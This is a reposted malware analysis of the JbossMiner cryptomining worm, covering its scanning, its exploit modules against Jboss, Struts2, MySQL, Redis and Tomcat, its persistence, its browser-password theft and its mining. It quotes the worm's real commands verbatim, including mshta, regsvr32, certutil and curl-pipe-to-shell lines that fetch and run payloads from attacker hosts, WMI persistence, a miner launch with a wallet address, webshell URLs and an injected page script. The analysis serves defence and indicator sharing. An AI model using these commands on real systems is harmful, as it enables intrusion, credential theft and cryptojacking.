JbossMiner 挖矿蠕虫分析 (转载)

Wesley13
• 阅读 677

前言

从2013年的诞生,到2016爆发,挖矿(MiningCryptocurrency) 的高回报率,使其成为了一把双刃剑。据外媒去年的统计,比特币的算力(Hash Rate)已在半年内翻了一翻。

当比特币全网算力已经全面进入P算力时代,也就意味着需要有相应计算能力的设备高速运转,不间断地暴力验证和工作,来支撑矿工们的“野心”。

自2017年11月以来,阿里云安全监控中心成功捕获到一系列的同源挖矿事件,被感染的主机中发现了名为F-Scrack-Jexboss的恶意文件,用于执行挖矿任务,并对外扫描扩散。本次受害主机以Jboss服务为主,我们将其命名为“JbossMiner”。

通过监控JbossMiner相关情报,阿里云安全团队发现,JbossMiner挖矿蠕虫在18年初爆发式增长,随后增速迅猛,近期稍有回落。

JbossMiner 挖矿蠕虫分析 (转载)

本文将以“JbossMiner”的核心代码为基础,分别从扫描、入侵、利用、挖矿等功能进行展开,完整分析并还原整个过程。希望研究者和非安全专业领域的读者们,能从全局角度看到挖矿木马如何瞄准“宿主”,扩张木马僵尸网络,并可持续利用。为企业和机构的入侵检测和挖矿防范,提供新的视角。

注:JbossMiner中用到的漏洞,阿里云上已默认可拦截,并且,安骑士已可以检测JbossMiner中的恶意程序,和执行的恶意命令。建议及时关注威胁提示,如有异常事件可尽快处理。

解构JbossMiner:核心代码分析

阿里云安全团队在蜜罐中捕获到该二进制样本,该样本由py2exe打包,解包反编译后是一套由Python编写的完整攻击程序,包含源码及依赖类库等数十个文件,核心功能代码文件列表如下图所示:

JbossMiner 挖矿蠕虫分析 (转载)

其核心功能分为四大部分,分别为:扫描、入侵、恶意代码植入、挖矿。通过这几部分的分工协作,完成整个入侵——植入——持续扩张流程。相关逻辑由Python和Shell脚本实现。

下图为“JbossMiner”完整的传播及利用路径:

JbossMiner 挖矿蠕虫分析 (转载)

下面,本文将对上述四大功能部分进行详细分析。

寻找目标:JbossMiner的扫描过程

  • 内网扫描:读取本机网络地址并据此生成C段进行扫描。
    JbossMiner 挖矿蠕虫分析 (转载)

  • 公网扫描:从指定地址拉取IP和子网掩码,并解析成对应的IP列表。
    JbossMiner 挖矿蠕虫分析 (转载)

u.swb.one会在每次请求时生成一段目标地址,如下所示:

199.123.16.0/21 103.30.248.0/22 58.10.0.0/15 94.76.64.0/18

随后JbossMiner对目标IP进行ICMP探活,随后对存活主机的指定端口进行扫描,并根据端口对应的服务启动攻击模块。

JbossMiner 挖矿蠕虫分析 (转载)

攻陷宿主:JbossMiner的入侵模块分析

JbossMiner蠕虫客户端内置的入侵模块有以下几种。

首先是Jboss利用模块

Jboss是一款开源的企业级Java中间件,用于实现基于SOA架构的web应用和服务。2015年,安全研究人员披露Java反序列化漏洞利用方案,Jboss首当其冲,直至今日仍有相当数量存在漏洞的服务器暴露在公网。JbossMiner复用了开源自动化入侵工具Jexboss,该工具由Python编写,支持多种Jboss命令执行漏洞的检测和利用。

JbossMiner 挖矿蠕虫分析 (转载)

第二,Struts2利用模块

Struts2是当下流行的Java网络应用框架,针对该框架的命令执行漏洞层出不穷。据阿里云态势感知观测,目前Struts框架漏洞仍为黑色产炙手可热的入侵手段。JbossMiner内部集成了从S2-005到S2-053的全部漏洞利用代码,入侵成功后通过系统命令控制目标服务器远程拉取文件进行挖矿和持久化。

JbossMiner 挖矿蠕虫分析 (转载)

第三,"永恒之蓝"利用模块

永恒之蓝(EternalBlue)是美国国家安全局开发的漏洞利用程序,于2017年4月14日被黑客组织公开,并催生了以WannaCry为首的诸多蠕虫变种。目前很多机器已经修复该漏洞,暴露在公网的影响面有限,但仍不失为一种内网传播的有效手段。

JbossMiner 挖矿蠕虫分析 (转载)

第四,MySQL利用模块

MySQL服务的攻击面主要集中在SQL注入、弱口令及未授权访问。JbossMiner中的MySQL利用模块对系统及MySQL版本进行了简单适配,通过以下两种方式穿透到主机。

  • 利用方式1
    通过outfile/dumpfile导出文件,加载为UDF,执行系统命令。

JbossMiner 挖矿蠕虫分析 (转载)

UDF以16进制的方式存在于Python代码中,对Windows、Linux进行适配。

JbossMiner 挖矿蠕虫分析 (转载)

落盘文件IOC

文件名 lib_mysqludf32_sys.dll lib_mysqludf64_sys.dll lib_mysqludf32_sys.so lib_mysqludf64_sys.so

该木马携带的lib_mysqludf32/64动态链接库,其核心功能就是为了执行MySQL命令,以便运行恶意脚本,该木马作者将执行命令的代码放在了sys_bineval函数中,其中线程函数StartAddress负责执行用户传入的参数。

代码截图如下(Linux版本的代码类似):

JbossMiner 挖矿蠕虫分析 (转载)

  • 利用方式2

通过开启查询日志,并设定日志文件路径在crontab目录下,可以向定时任务写入恶意代码,除此之外MySQL中还有其他类似的日志配置文件可被利用。

JbossMiner 挖矿蠕虫分析 (转载)

第五,Redis利用模块

Redis服务的攻击面以未授权访问和弱口令为主,利用该服务穿透到主机进行后续渗透的方法五花八门,如利用数据导出功能将恶意代码写入系统的指定位置(如web后门、计划任务、SSH密钥等)。
JbossMiner首先探测目标Redis服务是否存在未授权登录,随即使用内置字典爆破密码,并将成功后的信息回传到黑客控制的回显平台。

JbossMiner 挖矿蠕虫分析 (转载)

其中make_crontab函数通过写crontab的方式穿透到系统,接入后续挖矿代码。

JbossMiner 挖矿蠕虫分析 (转载)

最后是Tomcat/Axis利用模块

JbossMiner针对Tomcat/Axis服务的入侵方式为WEB层弱口令爆破。

JbossMiner 挖矿蠕虫分析 (转载)

成功登入后,通过Tomcat上传功能部署后门,war包代码以hex格式存于Python代码中。

JbossMiner 挖矿蠕虫分析 (转载)

随后通过HTTP请求连接后门,依次下发后续利用的命令。

JbossMiner 挖矿蠕虫分析 (转载)

对Axis服务的利用方式与之相同,不再赘述。

部署的后门地址IOC如下:

服务

后门地址

Axis

http://%s/axis2/services/Cat/exec?cmd=

Tomcat

http://%s/is/cmd.jsp?pwd=futuresec&&cmd=

持续扩张:JbossMiner的后续利用方式

JbossMiner在成功攻破的服务器中执行系统命令以完成后渗透利用,具体指令如下:

'SchTasks.exe /Create /SC MINUTE /TN Update2 /TR "c:/windows/system32/mshta.exe http://enjoytopic.esy.es/ps3.txt" /MO 5 /F', 'wmic process call create "c:/windows/system32/mshta.exe http://enjoytopic.esy.es/ps3.txt"', 'curl -sL https://lnk0.com/VhscA1 | sh', 'wmic /NAMESPACE:"\\root\\subscription" PATH __EventFilter CREATE Name=888, EventNameSpace="root\\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_PerfFormattedData_PerfOS_System" AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"', 'wmic /NAMESPACE:"\\root\\subscription" PATH CommandLineEventConsumer CREATE Name=999, CommandLineTemplate="mshta http://enjoytopic.esy.es/ps3.txt"', 'wmic /NAMESPACE:"\\root\\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=888", Consumer="CommandLineEventConsumer.Name=999"', 'wmic /NAMESPACE:"\\root\\subscription" PATH __EventFilter CREATE Name=888, EventNameSpace="root\\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_PerfFormattedData_PerfOS_System" AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"', 'bitsadmin /create updateer3', 'bitsadmin /addfile updateer3 %SYSTEMROOT%\\System32\\mshta.exe %temp%\\mshta.exe', 'bitsadmin /SetNotifyCmdLine updateer3 mshta.exe "http://enjoytopic.esy.es/ps3.txt"', 'bitsadmin /Resume updateer3'

使用 SchTasks.exe、wmic、bitsadmin来实现在Windows平台的自启动,除此之外,并针对Windows和Linux执行不同的脚本,后续所有的恶意行为都由这两个脚本来完成,主要实现持久化、蠕虫传播、挖矿、窃取浏览器敏感信息等。

文章后面部分内容,将针对这两部分详细分析。

针对Windows系统的利用程序(vbs脚本)
http://enjoytopic.esy.es/ps3.txt

Linux系统的利用程序(Shell脚本)
https://lnk0.com/VhscA1

Windows Payload

针对Windows系统,JbossMiner在攻击成功后将使用mshta命令执行名为ps3.txt的vbs脚本,ps3.txt中的shellcode执行流程简图如下:

JbossMiner 挖矿蠕虫分析 (转载)

ps3.txt文件的部分内容截图如下:

JbossMiner 挖矿蠕虫分析 (转载)

解密后的vbs中嵌入了一段powershell命令,解密后,var_code即为最终要执行的代码(base64编码)如下:

JbossMiner 挖矿蠕虫分析 (转载)

var_code是为一段shellcode,shellcode内自己实现LoadLibrary和GetProcAddress逻辑,动态加载wininet.dll,获取wininet.HttpOpenRequestA等相关API来实现http的访问。

它会请求d1uga3uzpppiit.cloudfront.net/dCrC文件,该文件是一个加密后的DLL,MZ头经过精心构造,可直接当作代码执行。解密后的dll中包含导出函数ReflectiveLoader,负责reload自身并执行。从结构上来看,这部分payload由Metasploit生成,与上文中提到的Mettle类似。

JbossMiner 挖矿蠕虫分析 (转载)

JbossMiner 挖矿蠕虫分析 (转载)

该dCrC文件主要作用就是接受服务器下发的powershell命令并运行,其核心代码截图如下:

JbossMiner 挖矿蠕虫分析 (转载)

在dCrC文件与swb.one服务器交互,接收其powershell命令并执行,完成自启动和下发其他恶意程序(挖矿、蠕虫、窃密)。

powershell命令经过解密后如下:

New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -PropertyType String -Value mshta http://xmr.enjoytopic.tk/d/ps3.txt  New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater2 -PropertyType String -Value regsvr32 /s /n /u /i:http://xmr.enjoytopic.tk/d/regxmr3.sct scrobj.dll  New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater3 -PropertyType String -Value regsvr32 /s /n /u /i:http://xmr.enjoytopic.tk/d/regxmr222.sct scrobj.dll  $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='Updater111';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 13 AND TargetInstance.Minute = 00 GROUP WITHIN 60"};$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name='Updater111';ExecutablePath='%SYSTEMROOT%\System32\regsvr32.exe';CommandLineTemplate ='/s /n /u /i:http://xmr.enjoytopic.tk/d/regxmr222.sct scrobj.dll'};Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer};  $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='Updater222';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"};$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name='Updater222';ExecutablePath='%SYSTEMROOT%\System32\regsvr32.exe';CommandLineTemplate ='/s /n /u /i:http://xmr.enjoytopic.tk/d/regxmr222.sct scrobj.dll'};Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer};

除了上述的下发powershell命令外,还下发了两条下载命令:

C:\Windows\system32\cmd.exe /C certutil -urlcache -split -f http://emsisoft.enjoytopic.tk/tg3.txt %temp%\svthost.exe &&wmic process call create %temp%\svthost.exe C:\Windows\system32\cmd.exe /C certutil -urlcache -split -f http://emsisoft.enjoytopic.tk/fix.txt %temp%\svshost.exe &&wmic process call create %temp%\svshost.exe

分别下载svthost.exe的后门程序和svshost.exe横向渗透传播程序,其中svshost.exe横向渗透传播程序也是由python脚本打包而成的exe程序,于运行时释放运行所需文件,其文件列表截图如下:

JbossMiner 挖矿蠕虫分析 (转载)

下面再来看看这个svthost.exe的后门程序是如何盗取浏览器用户名和密码信息的 — 我们在测试环境下作了验证。

后门程序不仅盗取Chrome浏览器中存储的账号和密码,还盗取Firefox浏览器中存储的账号和密码。其上传盗取数据的接口是:https://u.swb.one/upload/win,相关代码截图如下:

JbossMiner 挖矿蠕虫分析 (转载)

Chrome浏览器将访问网站的相关用户名和密码,加密保存在一个SQLite数据库中,路径为:%APPDATA%\..\Local \Google\Chrome\User Data\Default\Login Data"。svthost.exe后门程序首先遍历进程检查被攻击者的电脑是否运行了Chrome浏览器(chrome.exe),之后再去获取Chrome浏览器账号和密码保存的数据库文件,解密后上传到黑客的外部服务器。

检查Chrome浏览器保存密码的数据库路径:

JbossMiner 挖矿蠕虫分析 (转载)

其中sub_417C10函数拿到解密后的账号和密码,发送到外部服务器。

JbossMiner 挖矿蠕虫分析 (转载)

同样,svthost.exe后门程序也是先确认该用户是否安装了Firefox浏览器,然后利用NSS的开源库,对没有设置浏览器设定主密码的攻击对象(一般会默认为空)进行破解,提取全局hash,获得它与空密码做hash后的运算结果,然后使用该结果破译SDR密钥,再用破译的SDR密钥危害证书,最后拿到Firefox浏览器中保存的账号和密码。

检测是否安装了Firefox浏览器代码片段:

JbossMiner 挖矿蠕虫分析 (转载)

加载NSS开源库的nss.dll,然后利用其提供函数进行运算:

JbossMiner 挖矿蠕虫分析 (转载)

最后拿到被攻击者的网站,以及其对应的用户名和密码,并上传到服务器,其代码片段如下:

JbossMiner 挖矿蠕虫分析 (转载)

Linux Payload

针对Linux系统,JbossMiner在攻击成功后将命令写入crontab来实现后续利用,宿主机将定期下载指定shell脚本执行。

JbossMiner 挖矿蠕虫分析 (转载)

对该shell进行进一步分析,首先从远端拉取名为hawk的文件并执行。

JbossMiner 挖矿蠕虫分析 (转载)

该文件实为MetaSploit中的Mettle组件,根据预设的DNS(cs.swb.one)查找控制端反弹shell,其中swb.one域名下多次发现黑客资产,分别用于文件服务、接收爆破成功后回传的信息、接收反弹shell。

JbossMiner 挖矿蠕虫分析 (转载)

获取利益:JbossMiner挖矿过程

JbossMiner针对Windows和Linux系统分别做了两套挖矿程序,实现跨平台挖矿。两套挖矿程序在不同平台下的运转详情分析如下。

Windows平台的挖矿部分

在Windows系统上,JbossMiner蠕虫执行regsvr32 /s /n /u /i:http://xmr.enjoytopic.tk/d/regxmr3.sct scrobj.dll等命令,在vbs脚本中实现下载挖矿程序并执行,相关代码如下:

JbossMiner 挖矿蠕虫分析 (转载)

这里借助MSXML2.XMLHTTPWScript.Shell对象,将http://enjoytopic.esy.es/rigd32.txt挖矿程序下载到系统的临时目录,配置矿池和钱包参数,启动挖矿程序进行挖矿谋利。

Linux平台的挖矿部分

JbossMiner蠕虫在linux平台上启动的sh脚本具体内容如下,它判断用户是否为root,若是则执行lowerv2.sh,若否则再次尝试写root用户的crontab,同时执行rootv2.sh,这两个shell脚本实现了挖矿逻辑。

JbossMiner 挖矿蠕虫分析 (转载)

以低权限挖矿脚本(lowerv2.sh)为例,脚本从远端下载矿机的配置文件(config.json)和挖矿程序(bashd)进行挖矿,同时复用上述反弹shell的部分代码。其内置了三组配置文件和挖矿程序,依次作为候补方案。

JbossMiner 挖矿蠕虫分析 (转载)

执行次序

挖矿程序

配置文件

1

[lienjoy.esy.es/bashd](https://www.oschina.net/action/GoToLink?url=http%3A%2F%2Flienjoy.esy.es%2Fbashd)

[lienjoy.esy.es/config.json](https://www.oschina.net/action/GoToLink?url=http%3A%2F%2Flienjoy.esy.es%2Fconfig.json)

2

[lienjoy.esy.es/bashe](https://www.oschina.net/action/GoToLink?url=http%3A%2F%2Flienjoy.esy.es%2Fbashe)

[lienjoy.esy.es/config.txt](https://www.oschina.net/action/GoToLink?url=http%3A%2F%2Flienjoy.esy.es%2Fconfig.txt)

3

[lienjoy.esy.es/bashf](https://www.oschina.net/action/GoToLink?url=http%3A%2F%2Flienjoy.esy.es%2Fbashf)

[lienjoy.esy.es/bashf.cfg](https://www.oschina.net/action/GoToLink?url=http%3A%2F%2Flienjoy.esy.es%2Fbashf.cfg)

高权限挖矿脚本(rootv2.sh)挖矿逻辑与lowerv2相同,只是删除了写root用户的定时任务相关代码。

配置文件主要用于云控配置矿池地址和钱包地址,大部分类似。以config.json为例,其详细内容如下:

JbossMiner 挖矿蠕虫分析 (转载)

主页篡改-JS挖矿

基于阿里云态势感知,我们同期监控到多起Webshell通信事件与主页挂马事件。经分析发现,与JbossMiner为同一团队所为。与本次行动相关的Webshell,覆盖多种脚本语言的不同系统,其中部分存在明显的手工操作痕迹。

黑客通过Webshell向主机下发挖矿程序,同时在目标CMS主页插入前端挖矿代码,利用访问者的算力进行挖矿。

部分通过webshell执行的命令:

C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://d3oxpv9ajpsgxt.cloudfront.net/rigd64.exe',$env:TEMP+'/explorer.exe');start-process -WindowStyle Hidden $env:TEMP/explorer.exe -ArgumentList '-o pool.monero.hashvault.pro:80 -u 45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV -p iZ23jdqrusfZ --donate-level=1 --max-cpu-usage=90 -k -B' C:\\Windows\\TEMP\\explorer.exe\" -o pool.monero.hashvault.pro:80 -u 45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV -p iZ23jdqrusfZ --donate-level=1 --max-cpu-usage=90 -k -B  reg  add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ /v Updater2 /t REG_SZ /d C:\\Users\\Public\\Updater2.vbs /f cmd.exe /c cmd /c \"cd /d D:\\phpStudy\\WWW\\&certutil -urlcache -split -f http://121.126.223.211/tg.exe c:\\a.exe && wmic process call create c:\\a.exe&echo [S]&cd&echo [E]\" 2>&1 C:\\Windows\\system32\\cmd.exe /C certutil -urlcache -split -f http://enjoytopic.esy.es/tg3.txt svthost.exe && svthost.exe

主页插入代码:

<IfRAME height=0 width=0 sRc ="http://d3lvemwrafj7a7.cloudfront.net/c"></IFrAME> <script>var commandModuleStr = '<script src="https://d1ebv77j9rbkp6.enjoytopic.com/hook.js" type="text/javascript"><\/script>';document.write(commandModuleStr);</script>

其中iframe标签携带挖矿代码,矿池地址为pool.blockbitcoin.com,代码复用自开源矿池CryptoNoter。

结语

通过对JbossMiner的整体分析,我们发现,由于网上现成攻击代码的泛滥,和恶意文件对PE、ELF等可执行文件的依赖性减弱,使攻击者的技术门槛进一步降低。

例如,在JbossMiner中,由于借助wmi实现自启动,使用regsvr32.exe等下载恶意脚本执行,加之功能主要由vbs脚本实现,最后又借用了metasploit等成熟的攻击套件。这一系列的“基础”,使得攻击者不需要专业的编码能力,即可完成攻击。

从勒索软件、到挖矿木马,如何提升自身的防御水平,而不是简单的拉长防线,是业界和企业,需要警惕和思考的问题。

点赞
收藏
评论区
推荐文章
blmius blmius
3年前
MySQL:[Err] 1292 - Incorrect datetime value: ‘0000-00-00 00:00:00‘ for column ‘CREATE_TIME‘ at row 1
文章目录问题用navicat导入数据时,报错:原因这是因为当前的MySQL不支持datetime为0的情况。解决修改sql\mode:sql\mode:SQLMode定义了MySQL应支持的SQL语法、数据校验等,这样可以更容易地在不同的环境中使用MySQL。全局s
皕杰报表之UUID
​在我们用皕杰报表工具设计填报报表时,如何在新增行里自动增加id呢?能新增整数排序id吗?目前可以在新增行里自动增加id,但只能用uuid函数增加UUID编码,不能新增整数排序id。uuid函数说明:获取一个UUID,可以在填报表中用来创建数据ID语法:uuid()或uuid(sep)参数说明:sep布尔值,生成的uuid中是否包含分隔符'',缺省为
待兔 待兔
4个月前
手写Java HashMap源码
HashMap的使用教程HashMap的使用教程HashMap的使用教程HashMap的使用教程HashMap的使用教程22
Jacquelyn38 Jacquelyn38
3年前
2020年前端实用代码段,为你的工作保驾护航
有空的时候,自己总结了几个代码段,在开发中也经常使用,谢谢。1、使用解构获取json数据let jsonData  id: 1,status: "OK",data: 'a', 'b';let  id, status, data: number   jsonData;console.log(id, status, number )
Stella981 Stella981
3年前
Python之time模块的时间戳、时间字符串格式化与转换
Python处理时间和时间戳的内置模块就有time,和datetime两个,本文先说time模块。关于时间戳的几个概念时间戳,根据1970年1月1日00:00:00开始按秒计算的偏移量。时间元组(struct_time),包含9个元素。 time.struct_time(tm_y
Wesley13 Wesley13
3年前
mysql设置时区
mysql设置时区mysql\_query("SETtime\_zone'8:00'")ordie('时区设置失败,请联系管理员!');中国在东8区所以加8方法二:selectcount(user\_id)asdevice,CONVERT\_TZ(FROM\_UNIXTIME(reg\_time),'08:00','0
Wesley13 Wesley13
3年前
00:Java简单了解
浅谈Java之概述Java是SUN(StanfordUniversityNetwork),斯坦福大学网络公司)1995年推出的一门高级编程语言。Java是一种面向Internet的编程语言。随着Java技术在web方面的不断成熟,已经成为Web应用程序的首选开发语言。Java是简单易学,完全面向对象,安全可靠,与平台无关的编程语言。
Stella981 Stella981
3年前
Django中Admin中的一些参数配置
设置在列表中显示的字段,id为django模型默认的主键list_display('id','name','sex','profession','email','qq','phone','status','create_time')设置在列表可编辑字段list_editable
Wesley13 Wesley13
3年前
MySQL部分从库上面因为大量的临时表tmp_table造成慢查询
背景描述Time:20190124T00:08:14.70572408:00User@Host:@Id:Schema:sentrymetaLast_errno:0Killed:0Query_time:0.315758Lock_
Python进阶者 Python进阶者
10个月前
Excel中这日期老是出来00:00:00,怎么用Pandas把这个去除
大家好,我是皮皮。一、前言前几天在Python白银交流群【上海新年人】问了一个Pandas数据筛选的问题。问题如下:这日期老是出来00:00:00,怎么把这个去除。二、实现过程后来【论草莓如何成为冻干莓】给了一个思路和代码如下:pd.toexcel之前把这